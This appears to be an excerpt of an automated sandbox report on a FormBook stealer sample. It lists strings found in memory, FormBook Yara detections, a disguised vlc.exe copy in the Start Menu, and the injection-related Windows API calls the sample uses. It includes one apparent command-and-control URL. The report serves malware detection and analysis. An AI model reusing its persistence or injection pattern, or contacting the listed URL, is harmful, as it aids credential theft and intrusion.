          Source: SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe, 00000000.00000002.366962936.00000000063B0000.00000002.00000001.sdmp, vlc.exe, 00000002.00000002.399391314.0000000005FF0000.00000002.00000001.sdmp, vlc.exe, 00000006.00000002.426387479.0000000005910000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.426302286.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe, 00000000.00000002.366962936.00000000063B0000.00000002.00000001.sdmp, vlc.exe, 00000002.00000002.399391314.0000000005FF0000.00000002.00000001.sdmp, vlc.exe, 00000006.00000002.426387479.0000000005910000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.426302286.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe, 00000000.00000002.366962936.00000000063B0000.00000002.00000001.sdmp, vlc.exe, 00000002.00000002.399391314.0000000005FF0000.00000002.00000001.sdmp, vlc.exe, 00000006.00000002.426387479.0000000005910000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.426302286.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe, 00000000.00000003.340974188.00000000062C5000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0
          Source: SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe, 00000000.00000003.340974188.00000000062C5000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0/
          Source: SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe, 00000000.00000003.340974188.00000000062C5000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/aU
          Source: SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe, 00000000.00000002.366962936.00000000063B0000.00000002.00000001.sdmp, vlc.exe, 00000002.00000002.399391314.0000000005FF0000.00000002.00000001.sdmp, vlc.exe, 00000006.00000002.426387479.0000000005910000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.426302286.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe, 00000000.00000002.366962936.00000000063B0000.00000002.00000001.sdmp, vlc.exe, 00000002.00000002.399391314.0000000005FF0000.00000002.00000001.sdmp, vlc.exe, 00000006.00000002.426387479.0000000005910000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.426302286.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe, 00000000.00000002.366962936.00000000063B0000.00000002.00000001.sdmp, vlc.exe, 00000002.00000002.399391314.0000000005FF0000.00000002.00000001.sdmp, vlc.exe, 00000006.00000002.426387479.0000000005910000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.426302286.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe, 00000000.00000003.339694897.00000000062C9000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.
          Source: explorer.exe, 00000007.00000000.426302286.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe, 00000000.00000003.339567937.00000000062CA000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com4f
          Source: SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe, 00000000.00000002.366962936.00000000063B0000.00000002.00000001.sdmp, vlc.exe, 00000002.00000002.399391314.0000000005FF0000.00000002.00000001.sdmp, vlc.exe, 00000006.00000002.426387479.0000000005910000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.426302286.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe, 00000000.00000003.342799792.00000000062C6000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.de
          Source: SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe, 00000000.00000002.366962936.00000000063B0000.00000002.00000001.sdmp, vlc.exe, 00000002.00000002.399391314.0000000005FF0000.00000002.00000001.sdmp, vlc.exe, 00000006.00000002.426387479.0000000005910000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.426302286.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe, 00000000.00000003.342799792.00000000062C6000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deno
          Source: msdt.exe, 0000000C.00000002.606711985.0000000005A0F000.00000004.00000001.sdmpString found in binary or memory: http://www.xn--mgbaht9hj11byu.com/?9rn=O2JDHJlpz2Rt546p&kzrh28=10pkrk8xXthsIzrXSR/95AORgXFPF0sL7LI6N
          Source: SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe, 00000000.00000002.366962936.00000000063B0000.00000002.00000001.sdmp, vlc.exe, 00000002.00000002.399391314.0000000005FF0000.00000002.00000001.sdmp, vlc.exe, 00000006.00000002.426387479.0000000005910000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.426302286.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000C.00000002.602316294.0000000000C40000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.603587464.0000000002FB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.362182042.0000000004291000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.472784516.00000000016C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.430429619.0000000001580000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.395346123.0000000003E81000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.472823831.00000000016F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.421292153.0000000003831000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.429223817.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.469558497.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.430333784.0000000001550000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.361705637.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.471808114.0000000000590000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.vlc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 11.2.vlc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 11.2.vlc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vlc.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 0000000C.00000002.602316294.0000000000C40000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000002.602316294.0000000000C40000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000002.603587464.0000000002FB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000002.603587464.0000000002FB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.362182042.0000000004291000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.362182042.0000000004291000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.472784516.00000000016C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.472784516.00000000016C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.430429619.0000000001580000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.430429619.0000000001580000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.395346123.0000000003E81000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.395346123.0000000003E81000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.472823831.00000000016F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.472823831.00000000016F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.421292153.0000000003831000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.421292153.0000000003831000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.429223817.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.429223817.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.469558497.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.469558497.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.430333784.0000000001550000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.430333784.0000000001550000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.361705637.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.361705637.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000013.00000002.471808114.0000000000590000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000013.00000002.471808114.0000000000590000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.vlc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.vlc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 11.2.vlc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 11.2.vlc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 11.2.vlc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 11.2.vlc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.vlc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.vlc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_00419D60 NtCreateFile,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_00419E10 NtReadFile,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_00419E90 NtClose,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_00419F40 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_00419E8A NtClose,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01439860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01439660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014396E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01439950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01439910 NtAdjustPrivilegesToken,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014399D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014399A0 NtCreateSection,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0143B040 NtSuspendThread,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01439840 NtDelayExecution,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01439820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014398F0 NtReadVirtualMemory,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014398A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01439B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0143A3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01439A50 NtCreateFile,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01439A00 NtProtectVirtualMemory,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01439A10 NtQuerySection,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01439A20 NtResumeThread,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01439A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01439540 NtReadFile,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01439560 NtWriteFile,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01439520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0143AD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014395D0 NtClose,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014395F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01439760 NtOpenProcess,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0143A770 NtOpenThread,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01439770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01439710 NtQueryInformationToken,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0143A710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01439730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01439FE0 NtCreateMutant,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01439780 NtMapViewOfSection,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014397A0 NtUnmapViewOfSection,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01439650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01439670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01439610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014396D0 NtCreateKey,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 5_2_00419D60 NtCreateFile,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 5_2_00419E10 NtReadFile,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 5_2_00419E90 NtClose,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 5_2_00419F40 NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 5_2_00419E8A NtClose,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 5_2_017D9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 5_2_017D99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 5_2_017D9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 5_2_017D9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 5_2_017D98F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 5_2_017D9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 5_2_017D9A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 5_2_017D9A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 5_2_017D9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 5_2_017D95D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 5_2_017D9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 5_2_017D97A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 5_2_017D9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 5_2_017D9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 5_2_017D96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 5_2_017D9950 NtQueueApcThread,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 5_2_017D99D0 NtCreateProcessEx,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 5_2_017DB040 NtSuspendThread,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 5_2_017D9820 NtEnumerateKey,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 5_2_017D98A0 NtWriteVirtualMemory,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 5_2_017D9B00 NtSetValueKey,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 5_2_017DA3B0 NtGetContextThread,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 5_2_017D9A10 NtQuerySection,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 5_2_017D9A80 NtOpenDirectoryObject,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 5_2_017D9560 NtWriteFile,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 5_2_017DAD30 NtSetContextThread,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 5_2_017D9520 NtWaitForSingleObject,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 5_2_017D95F0 NtQueryInformationFile,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 5_2_017DA770 NtOpenThread,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 5_2_017D9770 NtSetInformationFile,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 5_2_017D9760 NtOpenProcess,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 5_2_017D9730 NtQueryVirtualMemory,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 5_2_017DA710 NtOpenProcessToken,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 5_2_017D9FE0 NtCreateMutant,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 5_2_017D9670 NtQueryInformationProcess,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 5_2_017D9650 NtQueryValueKey,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 5_2_017D9610 NtEnumerateValueKey,
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeCode function: 5_2_017D96D0 NtCreateKey,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 0_2_017BC134
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 0_2_017BE578
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 0_2_017BE568
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 0_2_0798C5B8
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 0_2_0798E050
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 0_2_0798BCE8
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 0_2_0798B9A0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_00401030
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0041D96D
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0041DAB1
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0041DCBF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_00402D88
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_00402D90
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_00409E40
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_00409E3B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0041DF98
